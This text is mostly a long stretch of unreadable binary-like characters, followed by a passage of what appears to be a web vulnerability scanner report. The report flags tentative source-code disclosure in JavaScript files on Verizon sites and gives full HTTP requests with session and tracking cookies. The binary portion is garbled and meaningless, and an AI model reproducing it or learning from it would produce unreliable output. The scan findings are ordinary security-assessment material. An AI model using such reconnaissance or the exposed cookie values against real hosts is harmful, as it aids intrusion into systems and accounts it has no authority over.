.1..z.B7..-M..4.h. .tl.]&DO..e\$..?x....~_..^.zL..t.4.z...,".k.....^....%y...5    .a.....;.+.D.T......$.....J..'i.-..............e8.=6%y5L..22Z...O.A.3.T}:..MWM..GH..zE.w......n$;.^pM/.PZ.H........,..............F.}e...|....t..h.......3...\,.Gu..G0.VJ.+.....{Z.1..M.....{....en.6.h......Ev].W3........^.kB..Zv.c.....Scq...L.*.)...J........J....0.C.a...^.......{KJ.F...Z.?$ym.6Ffq....[....
.i...J...6.c...T.j.o.....`.qM=$Gf.....o......}E....t.%..z.a...!..../...~.....9..ejfV..q..U..T.+....x.(...nCcz..h...Y...9.M.[....$w\U....p.q.........sQ,....7`.K..1<e].U.Z)..N.6kB.c.G...}..p......Ul\.I...T......g7...,.f.....v.....Mk...N...5..3.*U..N
....H...,...JUksq....xUD..^>..p!.<...2L..|...^..../rE..w..7    ~..Y..W.......,..
f..l...|..|.....:4_.....T...>`Ki..K..o9...U...{...(.=....:\.].KZ...p-W..*.LG..!.3q...........e.GX.2E8.>M..x..y..    .O.....
].d4...y.....C...........[..v(.X|.f..."...u..1..<5KI....V...q.eu.S.d.pJ<;T2.|+7MgU..u..&.N6.I....S...ZW..R.&.D...U.........dGxa....m......}...?3.p.F.3^z33.MVZ.K..>In...<|(q....sa......./...*.+........n.....W0:.....>....YZ.w..S\..1?C..= ..._l...<..~'X.........+.......2.l...c.....d..._M..4\....+..)b..,.>.&zB.X.H.
S.}.Y...g.7......}.....i..]......o.8k.f....C..ur.'.....df...>...p.U.\............!p.....W.e..    .....k...a.E....J...l%.%...e..Tq....&=3..B3..8Ln$.Z.C..l....#..23...i...E.n.Eb...?fXZ`...r.....(9..4.
...s.F..G........C3..r_...O|?j..j..&..}i..O"....w../..P..&[.....".R.o.........V.G...Y..j5\UX...........+.....U..z.q.::.....W?|J..p....A.W....S..m....u...".*..x.k.....3.m.>q...p.....W..'O.ih..#......?6.Nhd....h...[e..(....P.....Zu...;.....h(.P.....X.......>:.|...../0.....%..0...Y."_..R......yF....#...J.Ji.<52\......D.....M.......n...`8...........4_m..w...x...oY.m&.....j.b.......LO....U...B.8a. O5.?....MoKVZ.w....z.....o8...Z......u.y...NI.VB.G%...Q.'.........fF....    66.S.%..Kb.|.1%..gd..V...z7.9.L..*........*..xR....Y..zjH#.Z..?5..Aij..|.j.5N4........Q...D_.ZF=^6.......S.GH...a......:F..|..NF.3*.s..|._~:7<..Ti.....5y.Ew......    )..F."......f3.,.O.;.=e....eqT9..U.....:.`....?...6..Q%..UP|.T:..GXX.T^..]+N.9.Ej.......d....oG.>.
.JU....O.m....5.>.E...n.y...?k$..2=;"...."..Th.2ot..#......7.f:.    .U3.ld..K....G{t.#p.C.j.r....\
G.5M_..2.6..k....F..0..U....A......2]X.._...7=..s.K...L}tY..v.g.U`....,>l8...K...w....*8i+.i...t..}.w.Z..iU..S]..y\....g.....l.n..]:d2...SN.....]..Yi.o._-..~......L.*..n[..p7....}V.4{.M.FO.6y..0..S...]'............V..x$.8.p.k~.....\....c..81.........I...r...&-Ze~...6.RN[.[js.m..r...T5.....ZxK.T..iM.p...
...8:.....s)...rI}uj.k~....K...l......[.A......    .w..).e....aWg|...i5..?.....^.%O......-..=[qr_.D..}-%.......&...V...-...X..%.FJ.VizV.S...xF..u..i....f...C..X...+.?.r.x~.._y..N..6G..H..m-.1...:5.Ye<K;.%g}.&..u..S;..y..Ok..}.......v.:...Tz..Ao..'.-qU...M&y ...X.......0Gf.$m..Y.L.Zd0.O..Y3....]..|uj9..!..rJ...V...s.K.O....y:....sSC..|u^v....Ka....?.....w.6C..CU...g..o.qB&.|.Tj...#M..A_.W*............'.I.P....$..mr..P...M..lDXqU..V...o...,..{<.W.....}......Pl.c.....C..r..p@...q.......W<i....9...4.z..N..........`~.c|.c|.S....L...6...Q..|^..M..B...^z.*..M.~...7p..,-.<..}..l.}.c.-..>...........;..)-Z...o.#}....g.>.l.n.......a.u...;}..A.Tg...A....A...1......h....*?...j...O.T.].s_.....z.EW...*......;.........%..A....I..>.m...6..w.t....../.9.7_I.o*.2iw.....}Y..I..`...
...AU.e{.7.,]..y...lA.._>.5.17.t;.IH......?.......
...!...c>.bn../..}.....$.%.~z..r~..i.q./.V..*..~.QH.
c|..~...?..],....u.+..p..10.mb....mYi...ZY..p..&H........-)..MTl.RS.d\.....V...x...'.}/.|j.?..<...
W.f.Sn.9i.Y.....6.........y.~L....%O.i8.d.%..17}.A..pml..(.>...X.e..P....dd..X.    Ne......1..g.Ue.M...g...3.|.........a.?..>O.^.../.~.T+.m..Jj..O.0,.{...'.|.u.....^..?=.k......K|E...Ym...laOM3^.../$:I6.......ph..8...].T..&.^.A.....SP8.7..3....z..@v1...rE.>t}....;Wg..c...5@v.]Sd.e.....aUGX]..k........Vw...k...{.....s5.r.{..~...j.R.{......ms...{l..6.)...M.esO..B.^..'su2w.....>..gj...{.w.........e.>.>......w_....}...Z.7..&w...-.~.......................:BwO...t.<.].....b..Rw....t..]......V.}Tw....u.)]=..wf...{.....;...vW..=...kw.......v.T.{..=..^`w.......vw?.{.]]dw...;..=..Qvw....]}....    \..=....{f....zJ...T....g..VO..'......rx.Z=......C]cU.9=k...Nu......(...`..j..(..(.....,..z0..@S.jj...h.x.M]......V.."....Y..^.....[c.WZ<...x0h.m.........ms...=.{!W{.z@{..}b=....j    W..z@...[...6~...........\=...=...........\........q..+\......S..y0.#.<..:6..1...........uuS..t.......=.v.y0.St.\..t....S..j'...HWs]........-..|....0.....qy@G.<...].L.............N..sb.]=.......\.c....v....:..^qy@1....l.x..\.....]`W;.{@..j.x.h...<.g..<..    OI...&:cXW...Fwgy...g=Y/...a..E(....8....J...
c......X*..+...F......L..T9v...(.X...x6.Y].>=np9.1.GE.B...q...,....B\._.....df.."...h$..C...z..R.z...^../....i..R...2
'.+..OV.*.;*.+..y.z..P;".36...+`..gGR...s.c..=).!.._.1*.....yH........G.S6T6(.f(r<c..e"K..._..C.Dm....j.$.&.....q..i..Tf(".16..3....a..j.r.*>..a.7...v.MX3..../f.....W._.S.+...l./.....q....H.....r3....T;..Y.3.3.[R.AQ.FU..W..n.QJ.Qr.Q}..+......o..2..c./..<-.t...-.@.....+...0....l.1.....e.T.[....l.H..5b^..k...T......[K.....5;....a*...g.x....2.(k#..7....7...K)o.j.....H..6.g."...,p..a'3...'j-e.....!]d.]....Ww..=Ii    O.;h*....t..0...H.D.kQO.ZxH......~.`.fO.Z.$.h....<..<.j.6K<......z....PF.E.cf.x.....z.......'h~D...X).>U.0.(.Va.\a.b5".<..6.....Yg...]g. ..seO.OV;+..
.J.z..}C..v`....w/.hIlp...w..".2cW....]e...24..B...3......o.    .\./............+....
..
.J.z..}.
..VC.p.A..e..H..=.p..t....y......7..c3WY......8.2..#.G...%..    *"....l..u..ZP..#....i'32...,.\S.k.32...*.N....."......K..aGw.....=.N.(#...{.,...).9.+...".."..".j....U/C..w.JT...E(.E...wD..Y_.._..=..248~.
._. .SW..2..3.........N..*CS3..T.9..U.fp..F>Y...=.@.T..+......."........0.8.l!.>\f#..
...#e.0X...1Jf....~.9..
.X....H.....EL.Y.6Q6...1 eT......2.d.-'.].9k@.1EfS...1..J@......b3g....9g.lv .5'. .s........m....
.:kn5c..=....j..1.....h....k.Q    .{V.....4KuM~WS?.._kZ.fk.....Y.....`...&/D..0...i.c._F...E..5..`.P...5}.x..9.......w.h.b..y..E.W5>...a.b
...i... ..<.|,0..x.    .D...I.....O..A..>..    ..fC7..U..y.0.X.]m.-.X.,Bp1..`).^.p1.....J`......:....l.j....`3P..[.Q....6.U.....k..N`....=.{..Y........C....&......GP.Q..p....I...O#...,...?...|...\B.2p..
.+.......q....F..p..=........#...i......:.9..(.#x'.3..i...].n......i...{j...xo...........@`.0......g..l.. 8.....#.Q.h`..U..>....
.'A7.|
0...L.f.3....g...4>G..y./...E."`1..X
,.....
`%.
X.........`#.    (.6....`+.....v......`/....G.~...A..p.8.........I..p.8.........E..p...\..,...~.....n...;.]...)...e.=..c.h...:.9@G........].n@w .....=.^@o.....CS....... `,...>..
....#..`$0
.....8`.MsN..H..Q.>    ..L........`&0.......(=..._.,...E.b`    ..X.......J....._.........`#.    (.6.[.m.v`.....v.c%`{m..../........8...p4..6..U..A.(.u....8...'.SHs..,.9.<p....%..M.^..
.5....n..j..;..E.=...?......s....Z{.U..1%.;.......w..B......z ....z!....x_.........?.|0...6.|(0...t#.....(`40...|......o"0.k5. .T.i...g...f)Z.Y.....>...,.Z..@..E.b`    ..X......H..|...X........F.).P..\K,Ex+.......wA....kI.IfZ..\.{..!...G.......'....?.4............._......7...m.....]..d...>...)...G_...V........c]...c.]..F..r.;.......E..Z..xW]{...5..c.P..y.=....    ..:.......}.....7.......E{o..5..k.....}...a..F.....:;.Fx......Q'6.y&.O.
.....u....4.e|4...`.~w..}<...tsu.......u...6B}.......O..t..E,Ex....a...
]...g......~...^.......@.....{).-....W.g.t.+.\....w...~..^.i7......."L..!.0.:.~L..>.k.' wa...S.Y......|.....p...\...p...................=....Zr;..]k..7C....1..w.P_....k..}..]....#.k.{ ..pO.^.....}!........ ........
...a....@..9...c..H;...;..}7......I....1....0^.3...yw... .<...B...b...K..3.....({9.
`%.
X.......@    ............o.b...C....v.b7.=..%a...$..p.8D.....G.c.q..p.E.....>~.8............pU...~..    ..n.w...=.>..x.<...8.....@G........[P~7..@....    ..z.}.~..` 0...A.Uh-.....|..p`.P...F.....8`<0!Bk.&B(.&Q`2.).M%a...$. 2..Y.l`.0... ......"R..z...S`    .KIXF....$.....UDp`.......b....m a#.M$...3.fhJ.....6...a.......Eh..~.K0.v.R[.wb.v....Z.v..a..p.8F9.S.    .N.......-...p.8.\..Fh..%..I...*p.N...n.p+B..n#t'B...Fh.l..r....x..!.......$k.+..@. ........r...]..:.r...k
?d..T.G..........A...*..y0..i...qX.P.a.l.....5./...R.G@U.........k..9.{..S.|$...1P..q=.. 4...l`:..!.)...:........".Y...../.....#_...a..*.
.'A7...@....Q....`X..8.t....x.+..Z.....K.....!'....2h.,...b...............q....o....r.......Yt..^X[.e>M...a..t...@%T    ...\j....G..........S...?.|&T9...4.&T.t...qR.....<..q...;.OC.\.+.;.w.....lA8.....);.b.!~..E    3...4P.Q..... .....i.y....B.I.j...EV.I5...S...^.{3.g.A..S9..6..O...>....H.......Q.m....4Ys.vj.5N^ ;x.....<>.;..)k4.z4.o..g.....J........h4-.. .39.39.ovF.R`...L..L........a
..!..y.h.vtB4.D4.......;..8.w._.D....../...._.J.....NB..b.#.SH......!....B.....#.O..|..B=NP~`).9..6.....,g........."....+.U."p..A.!...q..-.6p..Ky.w..>..*.B......!w...t.:.....~.|+.]......B.yN@..M.C8..    .%;....    ...o.+.#..y. ........;...|2...p.8.. .* ...p)..6.......#.L..B...h...P-.?.....+..I:#|......nC>..A\{.......Q.<.FW.F#..i&S.....n..!."..........@....7..y..E..e-D..x..~.E.S.n..%......]
..Mp.ga.^E....@..........7".G...9.@...7.."..(..#.6`...h...QV......^.'W...b5....9...8.*s.2..Y....    ^.2.q.b....j.....p..+.......pn......f....+...#...;..].b.T.E.u
...2...    .qDV.\7.....z9..U.g...p...Y*cY..{.k...^..@.2....m.:p.....z......M.9~:.2/.n3.....E...V...ZW....".0D....*..=...k..<.....|..oy..?....m>t..G..OD.4`..W}8.}8.}.......Q..H..>.........B`
.N.f.ge...*|2...*f.....#<.....p.....i....j..j.XD5.@....._.......?W.'.j..j    ..RDl.V.+.q;x.....j.=2w.VC^..GV.=.j.."_.U..R./._    l`/.s..    ..R.....~.:..:..Q..A5.|x7.[....|ETu...0.]...0.....Z...G.>\...g..........+.v....X...n.
..7.....{...#\.%...8&...P9......
_....A*......c..|.V.o...[...y...D..G.........5..... /d..)..B....g .q.....(..Q8Q....k..wp$.....k&....t..&?..gk..`.,5...?cO..)..............?p............e`/p.....6.D>
.c....    .X..y{..D'...X.....u .*D$..D>.I.........}.D>.....!..d....~....B`'.wA..,.X....H.........y../Cxyt.6....Y...C3.9..Z{.Y.H......9.........H..B. |Y.@7
.    $...:T..dG".F.<.Q?'...u.M.O.,'b....#...
j..2
...8....H..~..FA.
y,.`.).i...O.n..1._...z.qw..@..7R..M.G.m..q.&......$Tx=...zp.8...GDP....;A.$.!.+..H....u.P...........G.|...t.&tSu4.%oA..:.....1
.$...&...:.\..}.l.... o..B..l.....?&...X...."..H9.|+.$...=.....KR.h..|E.J....|..t.P.....K.}..t..G!S...C......1.cx    
...1H....>.
...1".8J>....^......E...-    .)z&.Y0..y.<.}^...W.|..i_.._.Kb^.K.-...|...$^.........^C....z.....>..Dz..^...`.5t.k8._...P..p....~.|..R<..@...:..^..8L....O.....7p.{.g.7.v.....6M.........t=.+......5^......    y/..}.W.o".1[=...?.6.Q..._j.......K..MN=...a+P...z|...?...........u...>.:...Y..%T......G.....+H....J......De...Y.;..........{..]...&v..pqP..N...N .:rN..S.i.<..-b..g.._...;81.........1......w..w..._.......x..r...G...A7.| .8...m..A...... .......W..N..1......v..p...........y..........f...d!..@..........1.0...4Hh.=r....{..h...d..<...p%...@).+u6@.4..4.........|..\..`......B7.|..vb.aX..c.`o..(....&G.>....;....?By~..@...t.nC..Z.z.A...>.n,t.P...1.|^T............`....,...1. #..f.Tj...=!...!..#.p.=...:.k.Qy(n0....(a....G.<Z4
&F".D`...s'........o......k....>.[....=.I.C.....#..2.y......~4. ..:
...E.5......#P...........?.......E..a../.h.g.F|    x..F<...V.....:...pi....xUo.g.O.
l....4.5.;.x...|&P...v...F|9.`g#n..W!8.X.l.."...F.]4....fi.O"|......g...t...8.....S..40.y...@k...F..b....N.K...>.=.o..wL./y~......|.........h........S...O..4.sy...|3..,...(gC...6....@.X....    .3.c..}I
&w
:=...M...[....._..$..%<./........Sp..`MH.F=....#u7=.......~.B`.0.8.4..>....x..c....@...........7...3...;.$C...JJ...|.....z....m?.`.R.p$Y...r
..tb)...C(q.%..B)..G."....dY..........@7......!<..v...>.r)j...DQ.....1m..[S...{..    ...9Z...4.i.9.4G].....................`7`k...].....=...&.'......{ZzB:..-..j..6.O...c...Z:6~.|.._...#...t.....=..B...).>..%"....<K:...-Z:j..+.......%.zP.F.ZjI..pY....%.7lC.;="H..="j...:g..Y.{D&.l.L..Gx&?....QZ6?I2p$*...L.......B....U=.w.d....F|....;21.2.i..L~..Q.../...y.u........%]..~/..>.a. ._.g.M...d._P;..@5..d.k..!.q`.L....R.o.."4..F&........LtC6...@:..`....C.Mh.Y...BG.FG...x..b...k.....jmP.6(.\o..mP.6(.............5...5h.M.l......    mP....5.[..m0;...A.Z..mP....6... .A....?b.....x?a......./X....mQ..x..P..POp.'..    ..    vB=..(.|..S..a.
.-..g.    .H.    u..!...._..O...P..P..B}~F..F.......T..* .4.t..p....T.cAN.).`...%.d'...d.H..W(...<........F.!..
..F.!,.p.J...Q..]".X{..u . .x.U..Z.U6.*K...........l.U6.*.C.....Pe;P.s..9T+.o.t...Yr.,.!.v.......C..r(..rU..p...6...(....J..... ...o`.).Cm...ub...*k....r...(.G. ..@....    r...D....A.S.i.u0..K.fJ...:.B#. .6..J.(......EE.$2....u...-]..J.;....\...k......R.k........L...w.. SW...;....xA.....Q$.&......GM..'2..'..tH_.SS... s.^.[.|..|.Mo..b.R.W%..D..@:R..$.!%._..S...1..    ......R....R.:P..D
).t.Rk.m..R........Af...".K.......L..S..A....b...-.t%. E.'.3.<..q2....#A..t..=.....e| ..G.tb..S$.....Qk..........Q...A8.GB)I}H*..l..L"....t...D......G@...0x... ..9h........&..."a..|".#Az....-........ *p.....m(..@.+....i.......2...J2.9.:..3.zy.ZD....@.4.
h...    T@..d..2..8"..Q4.
h>..|*..T@....S..'.    $.'..H'g.M......P@S.l.z^T.M...r.4.
h.....i,e.Jd..2....1........jW.~.......:.@
..!2...o..C..(%r.L."..*L)....Q4+F.......*.X,.c4...
...".).........8...T..t.......,.|..r>.d...j.d*..".....X.u.......#R.'.L.O.m<...4.....Os.d2M.n.DtAL!...r..-"W.,.,......BZk@.-d    .4c.i..R3
.. .)~..oP.5.{...P.l...t.b.V..I.#.]$....@R;......k$u i.Y.C.?..C.d.5g2.j
.
..)..d.>..u
K._@..D..).M...B........df...F]=..z.5s...    ..p.F..4:....7...i.:..A.gP....fP~..$-!).HW
v'..>....l..v....E.fQ^.....$...N......)....rW.......iq..:......Z.Xm....G.C] .(x;b.u...0.&...H..,H.(. "+..3.J]@..8.."..E.R..JQD+."*..V.":?..WD..bZ$.h.(.c......D.Q.....$.....Q..:...]DgI*.......":Z......HS(.U..[..H.h.H    IcH.DR'...dH..Et...RQD.....NRd.bZK ..TD..RZU..#.hA).c....e8..b.............d9.I1.I1.I1u.
..b..b..b.    ..D....O..O..O@vSD[2.YL=TL3...    .6@..S.....P*g1.R1... ..^*.^*.^".r1.R1...XHD.P..Q...L...t.*w.bwQ....C..W1.^1..r.[H.E~.0A..t.h...I.r\_M.t5KXM..j...i._M+.j:...ENL..t....w.........z..@..d.eD..YHd...D....d&I.I.Dd>..D...Ed....$....@.@........K.L.m.5..`...".,.X..#*.../..3IzH    ..t....`{.H."k(.7e[O.@2....%.}.VS..8A6R.v.\@.."..&c..%r...!...=$.0.d$.."2..:..h...tXP...X.).....YE.
.R.I.C.
(...3H*"..H~$.K..Rm.....c..:^t...D.Q.y"K).G..Sp....b.KT
..E.$2."...F.m..I.@...S.4..I... J..z..&z.m.G...
r.r..o.......!.:..P.{.t...:..x..A...[b...N...KP;"...&..H."...$2.H_".....%2.H>..Dz.7c})..........4/KhU.B.J    .*%......^.....N..Jd...;I. %.....ZJhQ.iK.P..d{......Z<J._Jh.(.......Z<Jh...Fd"e..YBgI.u..&.....PBK.H."..t&...L.....D..m8.(.r.(%+..1.F...e;.-;h....y.mP@N.v....R...2..%....]t...$.d)..n2........N.{.h.....Z.........}T.>.B..R.Q) ..\!r..d}?...hcu.%. .....2..........d.... .bAf.A....u.6. ...H....f ...O.z....9@..F..$=r.t.dS.bQ=Du8...S..I.TG.ZGi.9......RG..z....(.qJu..{.z.$7.8..........+.SW..^8A.NR....$e........').).........}.y..i.p... ...i...&.-%$..;....8...k.3t.....9..*I....1...d.Xt..I.].....N?.HPE..G.VE....1fs.5.g..kz.\f.?.,.k........>/.o@%.'..V...e.U.LDU....:^$.|......I..#C).....,.5d.Z...u.M..e..+......_.#[...+.^..um...Z.O$./Io@..........}[T........#,..2"...{.....O....F}L..O(...Y..-.+5.3J......Q...:...M#...v.@.....1M....R...O.2.......(M...E..+..Y3h......\...J.........A%=.e.f.'....rD..c....$1]..g.T.0..2..X..?.1...T...(...O.a..R...2]o.V..7..I)..M..D:0Jb.a~$..o\\G.......e.e....Sp....r.$...
..
(R...3.rf.=.?..^TVo.K.....aN.7.:...M. 3<......C.......A...H"...&2..XJ<..9...".A,.D&Qp2.2..O..4".)v.....Ed6...4.r.#2?..l.z.=S... (.b.~.6...y....y...$.S..DV.#j%e.TR.U..$i5.\C..g-.<.H.>T........4.6.M....NP63.&&.RB).oa[.K...J..%v..........c.........Uv3....|/    {H..$T....9.d......NR.....@.P.~..\.b...?.Z~....,.....gL.NQ].O..*....L%0..YF.....s.O.......<.....y..G6...J.<WM~M.1.~...0)....o..o......C#z..=.C.}Qb...<$.......... z."9 q.A..L.\.........I...,Y.Q.s.ea7.Iy...|.....S.....k.$.....8J.?%E.#....Iz_!.....%....(....A"T...U..B...3...>\.F.#d.yE.)B..Q...E.#Bc....S.."t..g2W.    "4Q.(....I.R.....?.>M..d'1q%...rWY.i...!...3.@'...    l6.@..Su.)..9..4O...!./...X..a.e)8.bJHz.,.S.-.e.m.E=..[B........P.R,..H../.se.]....@...\.U..V,..gY-.-.....,ki6.....G.d. ..B.$.....!...R.P6~.bky...B...a'[.C6../..........{..,N.G..,.I.1K.zP..C..(.b9l....G(I.Q.?X....t.9.c..OP.rRD.S.*S...z...g.>.L~^p._0SH.b ....._6......&.f.....*Bu.0....l.wK.5.v.......'.*q.(.(..Y..&H.I.G.$6.b...8N.
..i=.!.....tV.    2W...=........].?....)..Jw..<..)=H..o.....%.3..V....J.$.Ce.%..2..7.)..h."RY.T.AJ.2XaC.3/..+yN..."J.U ..EQ(j.B3.P0]...G.+..%e$....X}4........e.h.x#0A.&..B..$.l.B.T..jDO..>..3...L.?K......(......b.......!.$-..W..".M."%.3....^RN-IK....2%....`.bj.r.....DVQ.V.nIkA.u..>...[....Q...m
.,..K.:,..&.f.,....-
.TK.
q}.B[C].0&.6._j..v..C1~...v*bC.v.l.M...C.1.{.<(.n.......J...I?(.....[B..+.#
.$.h..<...+..P.(.8.R`%Q....C....\.....B....E..).<R_P.n8/*.....?.....t_Q.W.[......*.vC...f.-"...w....0xO..........@.[......v..$kg...D:....Y.N.J&u..x....Ev..-...,......=,TT.....i.^`.ISQ}.F.r6..l...~. l.....2.`0.!.C.....'k#.Y+.X.i.h..6....Q..df.Y.O.&..01`...0IX.lX.b....04..M'C3..LK......m)7..X.s-...7..b~H!I...-...Y..n.,...wK,...@e.....Ya9    K-e...._i1~..U...C
l.....(T...Xg....z...^.`...f.....89m..K-..j0.......6lEt...S.~*.a.v.RvZ.?l.vY...&.Y....{E .?.Ls.-~.......A$<D.-.E p...?b.....a.(..ca.<n4..NX.'Q..)...N..=c.....D..SA..._..'..y....U......v]T....s.n.Xn..V...~..Yn[...NH.......A....%...=.,~.J?..N..WCU...IrTG.~2..N..z...<.4.L.E..C?,.*5....3..L...;3.!I...=,I...gX.^.??,Io3I...W..vK/.P......A$.R.V...!j...U.....T1n.6.`.*.H.5J..7Z-.#..1.    I.K....o..}..&
+.de.ae....N    ..T.A.T.t.~.L}.g.....?..Y.B.f...[..).?..#IsC.T..$;_./P.'B..!Ku...".8W...T.".?_.2.X./Q.....e.d/.....tZF<.W.".g..R.....}.J?\...T.*%.^......)..e-....t.m...-c.....l..(1K&....X..E.oQ...nUikB.b.....Ob...}.h...4...4.    ..G..t/.}j..y...6..).A.:`.......s......=....8*......F.O....Y.S...P.... .....L...i}....v.`.vE..U.y..^'r...7U.-.VXi...zG..W..<.H
......D..TR..W.>.@K..A`zO......(p..We.u.......U..[....fB...z....J?.!.IFOu".*...1...b._(.......n..Q.<k.....a......$.4.zY....*kXO.    ........J.W.TS....+..b..Z...2(<.............p3..K..h..~.+...T3"...bjc.'...JdR....-..$.....*..I.    ....5IJ.^GU..$...%".....$..Lr...xK........0)..&....w.4.......J.Gz....H...G....    ...1....Y..IN.j..*..Q..-=[.y.'y...$YT.oL...1..dR...T.kIj,...-..I4a..)L........fS&...^j.......o).wL..B....a..d0.w-...0..L&.%.
.f..[1...L.c.&...e...Ot.._L...L.....o.5?.......@7..R..*R..;..:......MJ..Kou..mW.?u.y..H...F.......S({    .....>dMU."... .g..C5P.3..yi0....Rs(H.0.....
...`.H..G    .to.ci.........n.?=.ItsZ..$....
A>...p2.{S@>.j.z.....|1...L.Og..}.(.>..[..4......d>...@>[..."Q."...p....>Du...s,6.X......1..r.r..+.....r.U.+I.!.....I. .....r.F........='..*ob.WR..%......R.7.@.a+HG.MD..j]...`.....E#".........d..>hZ.'3\...}..i.<$..........B.....d......O'A.y....iDuagDAgE..A.........H..]...D-..Q.UD.`.@.....#....[..mD.cwD.]....J....7{.._.....b.........R{.]Y.l.;....YG......F...t%W......x.+R.Y7.U)u.X)O..D.J>.sYOd..zA.wo.........T............hw?$=....t...5...v6..ee.l,g.AW.!...P$=..!...+..p..... .U6....i....!..}..R.eq.^....<....    .o...*.6.1GX!b6.I...d..l.,V....B.N...Q.N;..K....[f.=|.}&.W.Y.W..5Fl..n.\...<d8..C^&.U+.BYL.".V.E....C....nd.....R$Z&K48.d.........E.t.......+..A^..#...HX.y[+.a..t.[...m...6R...f..1....WU6...V".j3.}..9n.-..[E........v..c; oe;E...a.....l..=6...]l/...OX..y    3&...k.A......v.4O>"R..|..........&K;.    Q..._g.@....-.?1 ..3.t......T..R_."n.K.D..S..8}..#..7. 9z.0.HP.XK...DCd..a..+.1:....=X.(4...he.|    ...y..)S......|T..8|....w......X@..cb.....6I.R....)..d.q.4'N^.....M.^W.D..&z.....D..i..}......;.|..;3...3g..;{...4A...e....4].~...(......Z.%Y.u.e...tu..,...s.|.U.../...o..Z.)j.....m......]Y,..."...B..3K..E....
..."..{.s..S@F........<..... ....@.>..L}.!......%..x..1..T.APX*.F&.2D..^..e.....Et..J{.3...xj.F.....p<..F.s
q.0....QB....).A..X<$.n.q.>/...Vy.b...J...Q..3!..s.<    .[.rx.....'O.UW@~.<..{.i..... .2.
.r..i.x...A.
...[SNIP]...

12.10. http://static-business.verizon.net/SMBPortalWeb/resources/js/common.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://static-business.verizon.net
Path:   /SMBPortalWeb/resources/js/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /SMBPortalWeb/resources/js/common.js HTTP/1.1
Host: static-business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 27 Jul 2011 06:28:59 GMT
Accept-Ranges: bytes
Content-Length: 112736
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 05 Sep 2011 22:35:53 GMT
Connection: close
Vary: Accept-Encoding

var _lastActivityDate=new Date();function checkSessionActivity(){var c=new Date();var a=0;c.setTime(Math.abs((new Date()).getTime()-_lastActivityDate.getTime()));a=Math.floor(c.getTime()/(1000*60));va
...[SNIP]...
ow.movedownvar){clearTimeout(movedownvar)}}function wsMovetop(){wsStopscroll();wsCrossobj.style.top=0+"px"}function wsGetcontent_height(){wsContentheight=2880}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.html","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}wsGetcontent_height();function reload(){return}function closeAllDiv(a){try{if((a=="mp
...[SNIP]...
tyle.zIndex="-1";a.style.display="none"}if(document.getElementById("searchHeaderText")!=null){document.getElementById("searchHeaderText").focus()}return false}function underconstruction(){window.open("<%=request.getContextPath()%>/construction.","EBWin","top=20,left=250,screenX=250,screenY=250,width=760,height=480,status=no,scrollbars=no")}function contentDisplay(d,c,f,a){var e;if(c!=null&&c!=""&&a=="href"){e=c}else{e=d}e=e+"&r
...[SNIP]...

12.11. http://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /Content/verizonglobalhome/Includes/Javascript/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Content/verizonglobalhome/Includes/Javascript/common.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Content-Length: 20021
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 22:05:28 GMT
Accept-Ranges: bytes
ETag: "084291f9750cc1:5573"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:14:28 GMT
Connection: close

var req ;
var t1;
var cufOff = false;
var xpDecisions="";
var cid1="";
var cid2="";
var cid3="";
var cid4="";
var objAjax=null;
var clickreq;
var TryCountAjax = 0;
var TryCountD = 0;

var
...[SNIP]...
<4)
           {
               TryCountAjax=TryCountAjax+1;
               setTimeout(sPromo,2000);                    
           }
}
}


//Ajax Call xmlhttprequest -Logging start
//var chkXplus1log = "<%=chkXplus1Log%>";
var chkXplus1log = 'true';

function CallAjax(placements)
{
   if(chkXplus1log == 'true')
   {
    Createobj();
xlogParam = "xLogParam="+escape(placements) + "**" + escape(xp1src)
...[SNIP]...

12.12. http://www22.verizon.com/Residentialhelp/includes/javascript/TopLevelTab.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /Residentialhelp/includes/javascript/TopLevelTab.js

Issue detail

